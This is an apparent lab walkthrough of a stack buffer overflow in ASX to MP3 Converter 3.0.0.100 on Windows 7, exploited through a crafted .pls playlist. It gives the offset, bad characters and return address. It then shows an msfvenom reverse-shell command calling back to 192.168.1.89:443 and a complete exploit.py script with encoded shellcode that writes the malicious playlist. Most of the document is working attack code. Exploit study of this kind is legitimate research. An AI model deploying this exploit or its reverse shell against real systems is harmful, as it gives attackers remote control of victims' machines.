ASX to MP3 Converter 3.0.0.100 - '.pls' Universal Stack Overflow Walkthrough

(Updated: )
reference ASX to MP3 Converter 3.0.0.100 - '.pls' Universal Stack Overflow
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

badchar

omitted
\x00\x0a

offset

omitted
17417

return address

omitted
MSA2Mfilter03.dll 0x1005dacf

shellcode

1
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443  -f python  -v shellcode  -b "\x00\x0a"

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
shellcode =  b""
shellcode += b"\xdb\xc8\xb8\xa9\x83\xb2\x79\xd9\x74\x24\xf4"
shellcode += b"\x5d\x29\xc9\xb1\x52\x31\x45\x17\x83\xed\xfc"
shellcode += b"\x03\xec\x90\x50\x8c\x12\x7e\x16\x6f\xea\x7f"
shellcode += b"\x77\xf9\x0f\x4e\xb7\x9d\x44\xe1\x07\xd5\x08"
shellcode += b"\x0e\xe3\xbb\xb8\x85\x81\x13\xcf\x2e\x2f\x42"
shellcode += b"\xfe\xaf\x1c\xb6\x61\x2c\x5f\xeb\x41\x0d\x90"
shellcode += b"\xfe\x80\x4a\xcd\xf3\xd0\x03\x99\xa6\xc4\x20"
shellcode += b"\xd7\x7a\x6f\x7a\xf9\xfa\x8c\xcb\xf8\x2b\x03"
shellcode += b"\x47\xa3\xeb\xa2\x84\xdf\xa5\xbc\xc9\xda\x7c"
shellcode += b"\x37\x39\x90\x7e\x91\x73\x59\x2c\xdc\xbb\xa8"
shellcode += b"\x2c\x19\x7b\x53\x5b\x53\x7f\xee\x5c\xa0\xfd"
shellcode += b"\x34\xe8\x32\xa5\xbf\x4a\x9e\x57\x13\x0c\x55"
shellcode += b"\x5b\xd8\x5a\x31\x78\xdf\x8f\x4a\x84\x54\x2e"
shellcode += b"\x9c\x0c\x2e\x15\x38\x54\xf4\x34\x19\x30\x5b"
shellcode += b"\x48\x79\x9b\x04\xec\xf2\x36\x50\x9d\x59\x5f"
shellcode += b"\x95\xac\x61\x9f\xb1\xa7\x12\xad\x1e\x1c\xbc"
shellcode += b"\x9d\xd7\xba\x3b\xe1\xcd\x7b\xd3\x1c\xee\x7b"
shellcode += b"\xfa\xda\xba\x2b\x94\xcb\xc2\xa7\x64\xf3\x16"
shellcode += b"\x67\x34\x5b\xc9\xc8\xe4\x1b\xb9\xa0\xee\x93"
shellcode += b"\xe6\xd1\x11\x7e\x8f\x78\xe8\xe9\x70\xd4\xf3"
shellcode += b"\xb0\x18\x27\xf3\x43\x62\xae\x15\x29\x84\xe7"
shellcode += b"\x8e\xc6\x3d\xa2\x44\x76\xc1\x78\x21\xb8\x49"
shellcode += b"\x8f\xd6\x77\xba\xfa\xc4\xe0\x4a\xb1\xb6\xa7"
shellcode += b"\x55\x6f\xde\x24\xc7\xf4\x1e\x22\xf4\xa2\x49"
shellcode += b"\x63\xca\xba\x1f\x99\x75\x15\x3d\x60\xe3\x5e"
shellcode += b"\x85\xbf\xd0\x61\x04\x4d\x6c\x46\x16\x8b\x6d"
shellcode += b"\xc2\x42\x43\x38\x9c\x3c\x25\x92\x6e\x96\xff"
shellcode += b"\x49\x39\x7e\x79\xa2\xfa\xf8\x86\xef\x8c\xe4"
shellcode += b"\x37\x46\xc9\x1b\xf7\x0e\xdd\x64\xe5\xae\x22"
shellcode += b"\xbf\xad\xdf\x68\x9d\x84\x77\x35\x74\x95\x15"
shellcode += b"\xc6\xa3\xda\x23\x45\x41\xa3\xd7\x55\x20\xa6"
shellcode += b"\x9c\xd1\xd9\xda\x8d\xb7\xdd\x49\xad\x9d"

payload = "http://"
payload += "A" * 17417
payload += "\xcf\xda\x05\x10"
payload += "C" * 4
payload += "\x90" * 16
payload += shellcode

with open("exploit.pls", "w") as fp:
    fp.write(payload)

proof

Load->Playlist Files (*.m3u;*.pls;...)

Loading the playlist from other directories will crash the application when it’s attached by Immunity Debugger.
So I copy the exploit.pls to the directory C:\Program Files\Mini-stream\ASX to MP3 Converter.